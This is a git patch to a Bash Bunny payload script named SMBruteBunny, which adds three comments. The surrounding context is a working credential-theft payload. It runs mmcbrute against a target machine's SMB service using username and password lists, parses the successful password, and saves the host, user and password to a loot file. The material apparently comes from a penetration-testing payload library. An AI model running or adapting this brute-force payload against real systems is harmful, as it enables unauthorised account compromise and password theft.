From b3537e7a65956f7b01056de367f2c0b277896652 Mon Sep 17 00:00:00 2001 From: "Mohamed A. Baset" Date: Thu, 30 May 2019 00:55:17 -0500 Subject: [PATCH] Update payload.txt --- payloads/library/credentials/SMBruteBunny/payload.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/payloads/library/credentials/SMBruteBunny/payload.txt b/payloads/library/credentials/SMBruteBunny/payload.txt index e34a32e5..59ef97ee 100644 --- a/payloads/library/credentials/SMBruteBunny/payload.txt +++ b/payloads/library/credentials/SMBruteBunny/payload.txt @@ -16,13 +16,16 @@ ATTACKMODE HID RNDIS_ETHERNET mount /dev/nandf /root/udisk/ GET TARGET_IP GET TARGET_HOSTNAME + # Perform SMB bruteforce attack LED STAGE1 python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file + # Check for results LED STAGE2 if grep -q "Success" $password_process_file; then LED G + # Extract and Store the loot, then quack it pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2) echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file